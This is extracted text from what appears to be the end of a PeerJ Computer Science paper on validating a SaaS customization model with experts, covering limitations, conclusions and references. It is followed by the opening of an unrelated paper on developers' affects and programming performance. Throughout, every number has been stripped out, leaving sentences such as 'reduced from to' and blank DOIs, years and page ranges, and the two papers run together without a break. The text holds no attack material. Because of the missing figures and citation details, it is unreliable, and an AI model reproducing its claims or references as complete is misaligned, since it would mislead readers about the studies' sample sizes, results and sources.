fairly small for the iterative method, smaller numbers are considered sufficient for homogeneous samples (hong et al., ). moreover, when using the content validity index (cvi) method, experts are considered sufficient to validate the model (zamanzadeh et al., ). because our samples were relatively homogeneous (academicians) in terms of participants, expertise, to experts are sufficient for the adopted cvi analysis method, and more than experts would be unnecessary (polit & beck, ). accordingly, the number of experts used in this study should be considered acceptable. another issue with our sample size is the imbalance in the numbers of experts in rounds and . the increased number of experts from to in round was because the group of experts invited to participate in the second round was larger. although the required threshold value for consensus decreases as the number of experts increases, it is harder to achieve consensus with larger numbers. as such, the increase from to in round did not skew the results of this study. additionally, it is not required to have a consistent number of participants in all rounds of a study; for instance, cadorin et al. ( ) had participants in the first round and in the subsequent rounds of their study. ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. selection bias the selection of experts is essential for obtaining valid and reliable results. compared to random selection methods, our purposive sampling of experts may have led to selection bias. in our study, four possible issues related to selection bias were identified: . self-selection bias: this concern was mitigated by identifying and approaching the most suitable experts for our study via an extensive systematic mapping study (ali et al., ). . homogeneous sample: the diversity of experts strengthens the statistical power and the generalizability of results; however, a homogeneous sample in the studies that used the iterative method is acceptable to facilitate group decision-making process (skulmoski, hartman & krahn, ; logue & effken, ). . bias of superior individuals: experts were approached based on their published papers ( papers) that were most related to this study, and every paper had more than one author. therefore, there is a possibility that the experts who participated in this study are from the same organization or university, and in such a case, there is a real possibility that the ideas and opinions of one expert will be influenced by more dominant experts in the same organization (mubarak et al., ; fletcher & marchildon, ). accordingly, the experts opinions were collected anonymously via e-mail without being affected or pressured by other individuals (mubarak et al., ; halim et al., ; stevens et al., ). . different experts in each round: another possible limitation is having different expert panels in each round, which is not common in iterative methods (stevens et al., ; parratt et al., ). although having the same experts in the initial round who continued to participate in all rounds of a study provides the opportunity for the experts to alter their opinions in successive rounds based on the results of previous rounds to achieve consensus (stevens et al., ), the results may be influenced by forced consensus through conformity and diverse opinions being relinquished (parratt et al., ). considering this fact, having different experts participate in each round may arguably improve the results of a study (parratt et al., ). it is worth noting that the survey for round was sent to the same experts who were involved in the initial round and none responded within the time limit, leading to new respondents being selected for the second round. in addition, as participation in our study was voluntary, those who participated in round may not have had the time or inclination to continue. modification bias the model manipulation applied in this study resulted in the number of constructs being reduced from to by the removal of the personalization construct and associated items that did not attain an acceptable cvis value. although this modification to the model may have added a certain level of bias, the deletion of the personalization construct is indirectly supported by the findings of sms, where personalization received the lowest consideration of all customization solutions proposed for saas applications. furthermore, we followed the strategy of revising the items that did not meet the i-cvi criteria rather than deleting ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. them in round , leaving the deletion of the invalid item(s)/construct to the subsequent rounds. this strategy provided the opportunity for most of the items to be assessed at least twice. eventually, the deletion of the personalization construct and other items was deemed necessary for the study on grounds supported in the literature and by experts’ comments. conclusions the comprehension of the generic customization approaches and practices in the saas multi-tenant context and the identification of the key quality attributes of saas applications associated with customization is an opportunity to increase the understanding of saas customization, creating further discussions of the subject. the purpose of this study was, therefore, to develop a software customization model for saas quality to identify possible customization approaches, practices, and quality attributes in the saas multi-tenant context. in addition, this study can be considered the first one, to the best of the authors’ knowledge, to develop a theoretical, validated, and reliable software customization model for saas quality. to evaluate this model, an iterative method was used to conceptualize it, assess its content validity, and evaluate its reliability. a preliminary version of this model, composed of seven constructs (six customization approaches and saas quality) and items ( saas customization practices and saas quality attributes), was used. after the completion of two rounds of content validity evaluation, one construct and items were removed. to improve the reliability of the validated model, round was executed and all constructs achieved the required cronbachs alpha value. furthermore, the removal of only one item significantly reduced the cronbachs alpha value. the final version of the model consisted of six constructs and items. these six constructs and their associated items are as follows: ) configuration (eight items), ) composition (four items), ) extension (six items), ) integration ( items), ) modification (five items), and ) saas quality ( items). however, the model that was iteratively validated offers some certainty of construct validity, our ongoing research is to evaluate its construct validity and reliability with a larger sample of saas implementation team members, based on the industry environment. in addition, this study is restricted to the quality attributes of saas applications from a systematic mapping study (ali et al., ). however, this study does not claim that only these saas quality attributes are associated with customization. future studies could also be conducted to expand the model to include many other quality attributes of saas applications, especially saas attributes related to the affordability quality attribute (e.g., resource cost and maintenance costs). the key contribution of this study is that it advances existing knowledge on saas customization and quality by the development and validation of a software customization model. it also enhances the potential to analyze empirically the impact of software customization on saas quality from a software professionals perspectives. this study can be used as a source of qualitative and quantitative data for further investigation into the statistical linkage between software customization and saas quality. the findings of these future investigations will prompt evaluators, testers, and developers of saas applications to resolve quality-related issues before any customization is introduced. ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. acknowledgements the authors gratefully acknowledge the reviewersfor their valuable feedback and comments. additional information and declarations funding this work is supported by universiti putra malaysia. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: universiti putra malaysia. competing interests the authors declare there are no competing interests. author contributions • abdulrazzaq qasem ali conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • abu bakar md sultan conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • abdul azim abd ghani and hazura zulzalil conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the raw measurements are available in the supplementary files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references akojwar mra, kothari mrv, kahate msa, ganvir mrd. . software as a service with cloud computing. ijecce ( ): – . al-shardan mm, ziani d. . configuration as a service in multi-tenant enterprise resource planning system. lecture notes on software engineering ( ): – . alhamad m, dillon t, chang e. . conceptual sla framework for cloud computing. in: th ieee international conference on digital ecosystems and technologies. piscat- away: ieee, – doi . /dest. . . ali aq, sultan abm, ghani aaa, zulzalil h. . critical issues across saas develop- ment: learning from experience. international journal of advances in electronics and computer science ( ): – . ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /dest. . http://dx.doi.org/ . /peerj-cs. ali aq, sultan abm, ghani aaa, zulzalil h. a. customization of software as a service application: problems and objectives. journal of computer science & computational mathematics ( ): – doi . /jcscm. . . . ali aq, sultan abm, ghani aaa, zulzalil h. b. the five ws taxonomy on cus- tomization of software as a service applications. journal of computer science & computational mathematics ( ): – doi . /jcscm. . . . ali aq, sultan abm, ghani aaa, zulzalil h. a. empirical studies on the impact of software customization on quality attributes: a systematic review. journal of theoretical and applied information technology ( ): – . ali aq, sultan abm, ghani aaa, zulzalil h. b. a systematic mapping study on the customization solutions of software as a service applications. ieee access : – doi . /access. . . alkawsi ga, ali nb, alghushami a. . toward understanding individuals acceptance of internet of things-based services: developing an instrument to measure the acceptance of smart meters. journal of theoretical & applied information technology ( ): – . almorsy m, grundy j, ibrahim as. . tossma: a tenant-oriented saas security management architecture. in: ieee fifth international conference on cloud computing, – doi . /cloud. . . aulbach s, seibold m, jacobs d, kemper a. . extensibility and data sharing in evolving multi-tenant databases. in: ieee th international conference on data engineering, – doi . /icde. . . aulkemeier f, paramartha ma, iacob m-e, van hillegersberg j. . a pluggable service platform architecture for e-commerce. information systems and e-business management ( ): – doi . /s - - - . badidi e. . a framework for software-as-a-service selection and provisioning. arxiv preprint. arxiv: . . bell e, bryman a, harley b. . business research methods. th edition. oxford university press. bhatti mw, ahsan a. . global monitoring and control: a process improvement framework for globally distributed software development teams. journal of global information technology management ( ): – . brehm l, heinzl a, markus ml. . tailoring erp systems: a spectrum of choices and their implications. in: proceedings of the th annual hawaii international conference on system sciences. doi . /hicss. . . cadorin l, bagnasco a, tolotti a, pagnucci n, sasso l. . developing an instrument to measure emotional behaviour abilities of meaningful learning through the delphi technique. journal of advanced nursing ( ): – doi . /jan. . cancian mh, hauck jcr, von wangenheim cg, rabelo rj. . discovering software process and product quality criteria in software as a service. in: product-focused software process improvement. berlin, heidelberg: springer berlin heidelberg, – . chaumun m, kabaili h, keller rk, lustman f. . a change impact model for changeability assessment in object-oriented software systems. science of computer ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /jcscm. . . http://dx.doi.org/ . /jcscm. . . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /cloud. . http://dx.doi.org/ . /icde. . http://dx.doi.org/ . /s - - - http://arxiv.org/abs/ . http://dx.doi.org/ . /hicss. . http://dx.doi.org/ . /jan. http://dx.doi.org/ . /peerj-cs. programming ( ): – . special issue on software maintenance and reengi- neering (csmr ) doi . /s - ( ) - . chen d, li q, kong l. . process customization framework in saas applica- tions. in: th web information system and application conference, – doi . /wisa. . . coallier f. . software engineering–product quality–part : quality model. geneva: international organization for standardization. cohen l, manion l, morrison k. . research methods in education. routledge. correia a, penha jr, da cruz amr. . an architectural model for customizing the business logic of saas applications. in: icsoft. setúbal, portugal: scitepress. csmic. . service measurement index framework version . . carnegie mellon university. available at https://pdf pro.com/view/service-measurement-index- framework-version- - f a.html. davenport th. . putting the enterprise into the enterprise system. harvard business review ( ): – . davis ll. . instrument review: getting the most from a panel of experts. applied nursing research ( ): – doi . /s - ( ) - . de miranda pg. . saas (software as a service)-infrastructures and applications in real scenarios. phd thesis, instituto superior técnico, universidade tecnológica de. dong j, zhang s, shi y, xu x, guo w. . process customization based on dependent topology in software as a service model. in: the nd international conference on software engineering and data mining. piscataway: ieee, – . duarte filho nf, de souza bermejo ph, zambalde al, de barros us. . saasquality-a method for quality evaluation of software as a service (saas). interna- tional journal of computer science & information technology ( ): – . espadas j, concha d, molina a. . application development over software-as-a- service platforms. in: the third international conference on software engineering advances. ieee, – . espadas j, molina a, jiménez g, molina m, ramírez r, concha d. . a tenant-based resource allocation model for scaling software-as-a-service applications over cloud computing infrastructures. future generation computer systems ( ): – . fan h, hussain fk, younas m, hussain ok. . an integrated personalization framework for saas-based cloud services. future generation computer systems : – doi . /j.future. . . . fletcher aj, marchildon gp. . using the delphi method for qualitative, participa- tory action research in health leadership. international journal of qualitative methods ( ): – . gey f, landuyt dv, joosen w. . middleware for customizable multi-staged dynamic upgrades of multi-tenant saas applications. in: ieee/acm th international conference on utility and cloud computing (ucc). – doi . /ucc. . . gey f, van d, walraven s, joosen w. . feature models at run time feature mid- dleware for multi-tenant saas applications. in: proceedings of the th international workshop on models at run.time. ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /wisa. . https://pdf pro.com/view/service-measurement-index-framework-version- - f a.html https://pdf pro.com/view/service-measurement-index-framework-version- - f a.html http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.future. . . http://dx.doi.org/ . /ucc. . http://dx.doi.org/ . /peerj-cs. gilmore jh, pine bj. . the four faces of mass customization. harvard business review ( ): – . guo c-j, sun w, jiang z-b, huang y, gao b, wang z-h. . study of software as a service support platform for small and medium businesses. in: agrawal d, candan ks, li w-s, eds. new frontiers in information and software as services. berlin, heidelberg: springer berlin heidelberg, – . haines mn. . understanding enterprise system customization: an exploration of implementation realities and the key influence factors. information systems management ( ): – doi . / . hair jr jf, anderson re, tatham rl, black wc. . multivariate data analysis. new jersey: pearson education. halim n, sulaiman s, talib k, ng e. . identifying the relevant features of the national digital cadastral database (ndcdb) for spatial analysis by using the delphi technique. in: proc. international conference on research methodology for built environment and engineering. harris cl, holloway s. . development of an evidence-based protocol for care of pilonidal sinus wounds healing by secondary intent using a modified reactive delphi procedure. part one: the literature review. international wound journal ( ): – doi . /j. - x. . .x. he q, han j, yang y, grundy j, jin h. . qos-driven service selection for multi- tenant saas. in: ieee fifth international conference on cloud computing. piscat- away: ieee, – doi . /cloud. . . helmich m, müller j, krüger j, zeier a, enderlein s, plattner h. . mappermania: a framework for native multi-tenancy business object mapping to a persistent data source. in: amcis. atlanta: ais electronic library (aisel). hong qn, pluye p, fábregues s, bartlett g, boardman f, cargo m, dagenais p, gagnon m-p, griffiths f, nicolau b, o’cathain a, rousseau m-c, vedel i. . improving the content validity of the mixed methods appraisal tool: amodified e- delphi study. journal of clinical epidemiology : – doi . /j.jclinepi. . . . it governance institute. . cobit . : control objectives, management guidelines, maturity models. rolling meadows: itgi. joha a, janssen m. . design choices underlying the software as a service (saas) business model from the user perspective: exploring the fourth wave of outsourcing. journal of universal computer science ( ): – . kabbedijk j, jansen s. . variability in multi-tenant environments: architectural design patterns from industry. in: proceedings of the th international conference on advances in conceptual modeling: recent developments and new directions, er’ . berlin, heidelberg: springer-verlag, – . keeney s, hasson f, mckenna hp. . a critical review of the delphi technique as a research methodology for nursing. international journal of nursing studies ( ): – doi . /s - ( ) - . khanjani a. . quality of service model for software as a service in cloud computing from users’ and providers’ perspectives. phd thesis, universiti putra malaysia. ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / http://dx.doi.org/ . /j. - x. . .x http://dx.doi.org/ . /cloud. . http://dx.doi.org/ . /j.jclinepi. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /peerj-cs. khanjani a, rahman wnwa, ghani aaa, sultan abm. . saas quality of service at- tributes. journal of applied sciences ( ): – doi . /jas. . . . kong l, li q, zheng x. . a novel model supporting customization sharing in saas applications. in: international conference on multimedia information networking and security. – doi . /mines. . . kumara i, han j, colman a, kapuruge m. . software-defined service networking: runtime sharing with performance differentiation in multi-tenant saas applications. in: ieee international conference on services computing. piscataway: ieee, – doi . /scc. . . kumara i, han j, colman a, nguyen t, kapuruge m. . sharing with a difference: realizing service-based saas applications with runtime sharing and variation in dynamic software product lines. in: ieee international conference on services computing. piscataway: ieee, – doi . /scc. . . la hj, kim sd. . a systematic process for developing high quality saas cloud services. in: jaatun mg, zhao g, rong c, eds. cloud computing. berlin, heidelberg: springer berlin heidelberg, – . landeta j. . current validity of the delphi method in social sciences. technological forecasting and social change ( ): – doi . /j.techfore. . . . lee jy, lee jw, cheun dw, kim sd. . a quality model for evaluating software- as-a-service in cloud computing. in: seventh acis international confer- ence on software engineering research, management and applications. – doi . /sera. . . lee s, park sb, lim gg. . using balanced scorecards for the evaluation of software- as-a-service. information & management ( ): – doi . /j.im. . . . lee w, choi m. . a multi-tenant web application framework for saas. in: ieee fifth international conference on cloud computing. piscataway: ieee, – doi . /cloud. . . li h, shi y, li q. . a multi-granularity customization relationship model for saas. in: international conference on web information systems and mining. – doi . /wism. . . liu w, zhang b, liu y, wang d, zhang y. . new model of saas: saas with tenancy agency. in: nd international conference on advanced computer control, – doi . /icacc. . . logue md, effken ja. . validating the personal health records adoption model using a modified e-delphi. journal of advanced nursing ( ): – doi . /j. - . . .x. luo w, strong dm. . a framework for evaluating erp implementation choices. ieee transactions on engineering management ( ): – doi . /tem. . . lynn mr. . determination and quantification of content validity. nursing research ( ): – doi . / - - . makki m, van landuyt d, walraven s, joosen w. . scalable and manageable customization of workflows in multi-tenant saas offerings. in: proceedings of the st ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /jas. . . http://dx.doi.org/ . /mines. . http://dx.doi.org/ . /scc. . http://dx.doi.org/ . /scc. . http://dx.doi.org/ . /j.techfore. . . http://dx.doi.org/ . /sera. . http://dx.doi.org/ . /j.im. . . http://dx.doi.org/ . /cloud. . http://dx.doi.org/ . /wism. . http://dx.doi.org/ . /icacc. . http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /tem. . http://dx.doi.org/ . / - - http://dx.doi.org/ . /peerj-cs. annual acm symposium on applied computing, sac ’ . new york: acm, – doi . / . . manford c. . the impact of the saas model of software delivery. in: proceedings of the st annual naccq conference, naccq, auckland, new zealand. – . mathiassen l, sandberg ab. . process mass customization in a global software firm. ieee software ( ): – doi . /ms. . . mietzner r, leymann f. . generation of bpel customization processes for saas applications from variability descriptors. in: ieee international conference on services computing, vol. , – doi . /scc. . . mietzner r, leymann f, papazoglou mp. . defining composite configurable saas application packages using sca, variability descriptors and multi-tenancy patterns. in: third international conference on internet and web applications and services, – doi . /iciw. . . moens h, de turck f. . feature-based application development and management of multi-tenant applications in clouds. in: proceedings of the th international software product line conference - volume , splc ’ . new york: acm, – doi . / . . moens h, dhoedt b, de turck f. . allocating resources for customizable multi- tenant applications in clouds using dynamic feature placement. future generation computer systems (c): – doi . /j.future. . . . moens h, truyen e, walraven s, joosen w, dhoedt b, de turck f. . developing and managing customizable software as a service using feature model conversion. in: ieee network operations and management symposium. piscataway: ieee, – doi . /noms. . . mohamed f, abu-matar m, mizouni r, al-qutayri m, mahmoud za. . saas dynamic evolution based on model-driven software product lines. in: ieee th international conference on cloud computing technology and science. piscataway: ieee, – doi . /cloudcom. . . mubarak n, hatah e, aris mam, shafie aa, zin cs. . consensus among health- care stakeholders on a collaborative medication therapy management model for chronic diseases in malaysia; a delphi study. plos one ( ):e doi . /journal.pone. . müller j, krüger j, enderlein s, helmich m, zeier a. . customizing enterprise soft- ware as a service applications: back-end extension in a multi-tenancy environment. berlin, heidelberg: springer berlin heidelberg, – . nadanam p, rajmohan r. . qos evaluation for web services in cloud computing. in: third international conference on computing, communication and networking technologies (icccnt’ ). – doi . /icccnt. . . nguyen t, colman a, han j. . a feature-based framework for developing and provisioning customizable web services. ieee transactions on services computing ( ): – doi . /tsc. . . parhizkar m. . impact analysis of enterprise resource planning post-implementation modifications. phd thesis, city, university of london. ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . /ms. . http://dx.doi.org/ . /scc. . http://dx.doi.org/ . /iciw. . http://dx.doi.org/ . / . http://dx.doi.org/ . /j.future. . . http://dx.doi.org/ . /noms. . http://dx.doi.org/ . /cloudcom. . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /icccnt. . http://dx.doi.org/ . /tsc. . http://dx.doi.org/ . /peerj-cs. parratt ja, fahy km, hutchinson m, lohmann g, hastie cr, chaseling m, obrien k. . expert validation of a teamwork assessment rubric: a modified delphi study. nurse education today : – doi . /j.nedt. . . . parthasarathy s, sharma s. . efficiency analysis of erp packages-a customization perspective. computers in industry : – doi . /j.compind. . . . parthasarathy s, sharma s. . impact of customization over software quality in erp projects: an empirical study. software quality journal ( ): – doi . /s - - -x. polit df, beck ct. . the content validity index: are you sure you know what’s being reported? critique and recommendations. research in nursing & health ( ): – doi . /nur. . publications service management. . information technology infrastructure library (itil v ). london: publications service management. ralph m. . using variability descriptors to describe customizable saas application templates. institute of architecture of application systems – . rico a, noguera m, garrido jl, benghazi k, barjis j. . extending multi-tenant architectures: a database model for a multi-target support in saas applications. enterprise information system ( ): – doi . / . . . rolia j, krishnamurthy d, xu m, graupner s. . ape: an automated performance engineering process for software as a service environments. report hpl- - , hp labs, hp labs. available at https://www.hpl.hp.com/techreports/ /hpl- - .html. ruehl st, andelfinger u. . applying software product lines to create customiz- able software-as-a-service applications. in: proceedings of the th international software product line conference, volume , splc ’ . new york: acm, : – : doi . / . . ruehl st, wache h, verclas saw. . capturing customers’ requirements towards mixed-tenancy deployments of saas-applications. in: ieee sixth international conference on cloud computing. piscataway: ieee, – doi . /cloud. . . salama m, shawish a, zeid a, kouta m. . integrated qos utility-based model for cloud computing service provider selection. in: ieee th annual com- puter software and applications conference workshops. piscataway: ieee, – doi . /compsacw. . . saleh ai, fouad ma, abu-elkheir m. . classifying requirements for variability optimization in multitenant applications. in: ieee th international conference on cloud computing technology and science. – doi . /cloudcom. . . salih nk, zang t. . variable service process by feature meta-model for saas application. in: international conference on green and ubiquitous technology. – doi . /gut. . . salih nk, zang t. . modeling and self-configuring saas application, corr. arxiv preprint. arxiv: . . ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.nedt. . . http://dx.doi.org/ . /j.compind. . . http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /nur. http://dx.doi.org/ . / . . https://www.hpl.hp.com/techreports/ /hpl- - .html https://www.hpl.hp.com/techreports/ /hpl- - .html http://dx.doi.org/ . / . http://dx.doi.org/ . /cloud. . http://dx.doi.org/ . /compsacw. . http://dx.doi.org/ . /cloudcom. . http://dx.doi.org/ . /gut. . http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. samir a, darwish nr. . reusability quality attributes and metrics of saas from perspective of business and provider. international journal of computer science and information security ( ): – . scheibler t, mietzner r, leymann f. . eai as a service—combining the power of executable eai patterns and saas. in: th international ieee enterprise distributed object computing conference. piscataway: ieee, – doi . /edoc. . . schroeter j, cech s, goetz s, wilke c, aßmann u. . towards modeling a variable architecture for multi-tenant saas-applications. in: proceedings of the sixth interna- tional workshop on variability modeling of software-intensive systems, vamos ’ . new york: acm, – doi . / . . sekaran u, bougie r. . research methods for business: a skill building. edition. hoboken: john wiley & sons. shahin aa. . multi-dimensional customization modelling based on metagraph for saas multi-tenant applications, corr. arxiv preprint. arxiv: . . shen y, cui w, li q, shi y. . hybrid fragmentation to preserve data privacy for saas. in: eighth web information systems and applications conference. – doi . /wisa. . . shi y, luan s, li q, wang h. . a multi-tenant oriented business process customiza- tion system. in: international conference on new trends in information and service science. – doi . /niss. . . shrotryia vk, dhanda u. . content validity of assessment instrument for employee engagement. sage open ( ): . skulmoski gj, hartman ft, krahn j. . the delphi method for graduate research. journal of information technology education: research ( ): – doi . / . song j, zhang s, gong y, dai b. . a qos evaluation model for test-bed in the cloud computing environment. in: ieee ninth international conference on e-business engineering. piscataway: ieee, – doi . /icebe. . . stevens b, mcgrath p, yamada j, gibbins s, beyene j, breau l, camfield c, finley a, franck l, howlett a, johnston c, mckeever p, o’brien k, ohlsson a. . identification of pain indicators for infants at risk for neurological impairment: a delphi consensus study. bmc pediatrics ( ): doi . / - - - . sun w, zhang k, chen s-k, zhang x, liang h. . software as a service: an inte- gration perspective. in: krämer bj, lin k-j, narasimhan p, eds. service-oriented computing–icsoc . berlin, heidelberg: springer berlin heidelberg, – . sun w, zhang x, guo cj, sun p, su h. . software as a service: configuration and customization perspectives. in: ieee congress on services part ii (services- ). piscataway: ieee, – doi . /services- . . . sunikka a, bragge j. . what, who and where: insights into personalization. in: proceedings of the st annual hawaii international conference on system sciences (hicss ). – doi . /hicss. . . truyen e, cardozo n, walraven s, vallejos j, bainomugisha e, günther s, d’hondt t, joosen w. . context-oriented programming for customizable saas applications. ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /edoc. . http://dx.doi.org/ . / . http://arxiv.org/abs/ . http://dx.doi.org/ . /wisa. . http://dx.doi.org/ . /niss. . http://dx.doi.org/ . / http://dx.doi.org/ . /icebe. . http://dx.doi.org/ . / - - - http://dx.doi.org/ . /services- . . http://dx.doi.org/ . /hicss. . http://dx.doi.org/ . /peerj-cs. in: proceedings of the th annual acm symposium on applied computing, sac ’ . new york: acm, – doi . / . . tsai w, huang y, shao q. . easysaas: a saas development framework. in: ieee international conference on service-oriented computing and applications (soca). piscataway: ieee, – doi . /soca. . . tsai w, shao q, li w. . oic: ontology-based intelligent customization framework for saas. in: ieee international conference on service-oriented computing and applications (soca). piscataway: ieee, – doi . /soca. . . tsai w, sun x. . saas multi-tenant application customization. in: ieee seventh international symposium on service-oriented system engineering. piscataway: ieee, – doi . /sose. . . tsai w-t, zhong p, chen y. . tenant-centric sub-tenancy architecture in software-as-a-service. caai transactions on intelligence technology ( ): – doi . /j.trit. . . . van landuyt d, walraven s, joosen w. . variability middleware for multi- tenant saas applications: a research roadmap for service lines. in: proceedings of the th international conference on software product line, splc ’ . new york: acm, – doi . / . . walraven s. . middleware and methods for customizable saas. phd thesis, faculty of engineering, ku leuven. walraven s, landuyt dv, truyen e, handekyn k, joosen w. . efficient customiza- tion of multi-tenant software-as-a-service applications with service lines. journal of systems and software : – doi . /j.jss. . . . walraven s, truyen e, joosen w. . a middleware layer for flexible and cost- efficient multi-tenant applications. in: kon f, kermarrec a-m, eds. middleware . berlin, heidelberg: springer berlin heidelberg, – . wang s, zheng z, sun q, zou h, yang f. . cloud model for service selection. in: ieee conference on computer communications workshops (infocom wkshps). piscataway: ieee, – doi . /infcomw. . . wang y, mäntylä m, eldh s, markkula j, wiklund k, kairi t, raulamo-jurvanen p, haukinen a. . a self-assessment instrument for assessing test automation maturity. in: proceedings of the evaluation and assessment on software engineering. new york: acm, – . wynd ca, schmidt b, schaefer ma. . two quantitative approaches for esti- mating content validity. western journal of nursing research ( ): – doi . / . xiaojun r, yongqing z, lanju k. . saas template evolution model based on tenancy history. in: third international conference on intelligent system design and engineering applications. – doi . /isdea. . . xin m, levina n. . software-as-a-service model: elaborating client-side adoption factors. in: boland r, limayem m, pentland b, eds. proceedings of the th interna- tional conference on information systems. paris. yamada j, stevens b, sidani s, watt-watson j, de silva n. . content validity of a process evaluation checklist to measure intervention implementation fidelity ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . /soca. . http://dx.doi.org/ . /soca. . http://dx.doi.org/ . /sose. . http://dx.doi.org/ . /j.trit. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /j.jss. . . http://dx.doi.org/ . /infcomw. . http://dx.doi.org/ . / http://dx.doi.org/ . /isdea. . http://dx.doi.org/ . /peerj-cs. of the epic intervention. worldviews on evidence-based nursing ( ): – doi . /j. - . . .x. yang s, yoo b, jahng j. . does the saas model really increase customer benefits. asia pacific journal of information systems ( ): – . yilmaz m, o’connor rv, colomo-palacios r, clarke p. . an examination of personality traits and how they impact on software development teams. information and software technology : – doi . /j.infsof. . . . ying l, bin z, guoqi l, deshuai w, yan g. . personalized modeling for saas based on extended wscl. in: ieee asia-pacific services computing conference. piscataway: ieee, – doi . /apscc. . . zamanzadeh v, ghahramanian a, rassouli m, abbaszadeh a, alavi-majd h, nikanfar a-r. . design and implementation content validity study: development of an instrument for measuring patient-centered communication. journal of caring sciences ( ): – doi . /jcs. . . zamanzadeh v, rassouli m, abbaszadeh a, majd ha, nikanfar a, ghahramanian a. . details of content validity and objectifying it in instrument development. nursing practice today ( ): – . zhang y, liu s, meng x. . towards high level saas maturity model: methods and case study. in: ieee asia-pacific services computing conference (apscc). – doi . /apscc. . . zhang k, zhang x, sun w, liang h, huang y, zeng l, liu x. . a policy-driven approach for software-as-services customization. in: the th ieee international conference on e-commerce technology and the th ieee international conference on enterprise computing, e-commerce and e-services (cec-eee ). piscataway: ieee, – doi . /cec-eee. . . zhao s, zhang y, shen b, shen x, chen r. . mass data processing and personal- ized services in shanghai e-commerce credit evaluation platform. in: ieee international conference on progress in informatics and computing. piscataway: ieee, – doi . /pic. . . zia a, khan mna. . identifying key challenges in performance issues in cloud computing. international journal of modern education and computer science ( ): – . ziani d, alshehri a. . a new framework for customizing erp systems in a multi tenant saas environment. in: nd world symposium on web applications and networking (wswan). piscataway: ieee, – doi . /wswan. . . ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . /apscc. . http://dx.doi.org/ . /jcs. . http://dx.doi.org/ . /apscc. . http://dx.doi.org/ . /cec-eee. . http://dx.doi.org/ . /pic. . http://dx.doi.org/ . /wswan. . http://dx.doi.org/ . /peerj-cs. how do you feel, developer? an explanatory theory of the impact of affects on programming performance submitted june accepted july published august corresponding author daniel graziotin, daniel.graziotin@unibz.it academic editor philipp leitner additional information and declarations can be found on page doi . /peerj-cs. copyright graziotin et al. distributed under creative commons cc-by . open access how do you feel, developer? an explanatory theory of the impact of affects on programming performance daniel graziotin , xiaofeng wang and pekka abrahamsson faculty of computer science, free university of bozen-bolzano, bolzano/bozen, italy department of computer and information science, norwegian university of science and technology, trondheim, norway abstract affects—emotions and moods—have an impact on cognitive activities and the working performance of individuals. development tasks are undertaken through cognitive processes, yet software engineering research lacks theory on affects and their impact on software development activities. in this paper, we report on an interpretive study aimed at broadening our understanding of the psychology of programming in terms of the experience of affects while programming, and the impact of affects on programming performance. we conducted a qualitative interpretive study based on: face-to-face open-ended interviews, in-field observations, and e-mail exchanges. this enabled us to construct a novel explanatory theory of the impact of affects on development performance. the theory is explicated using an established taxonomy framework. the proposed theory builds upon the concepts of events, affects, attractors, focus, goals, and performance. theoretical and practical implications are given. subjects human–computer interaction, social computing, software engineering keywords affects, emotions, productivity, moods, psychology of programming, human aspects of software engineering, process theory, performance, interpretivism, theory building introduction it has been established that software development is intellectual, and it is carried out through cognitive processes (feldt et al., ; feldt et al., ; khan, brinkman & hierons, ; lenberg, feldt & wallgren, ; lenberg, feldt & wallgren, ). software development happens in our minds first, then on artifacts (fischer, ). we are human beings, and, as such, we behave based on affects as we encounter the world through them (ciborra, ). affects—which for us are emotions and moods —are the medium within which acting towards the world takes place (ciborra, ). the affects pervade organizations because they influence worker’s thoughts and actions (brief & weiss, ). affects have a role in the relationships between workers, deadlines, work motivation, sense-making, and human-resource processes for the purposes of this study, we consider affect as an underlying term for emotions and moods, in line with several other authors, e.g., weiss & cropanzano ( ); fisher ( ). see “affect, emotion, and mood” for more information. how to cite this article graziotin et al. ( ), how do you feel, developer? an explanatory theory of the impact of affects on programming performance. peerj comput. sci. :e ; doi . /peerj-cs. mailto:daniel.graziotin@unibz.it https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ 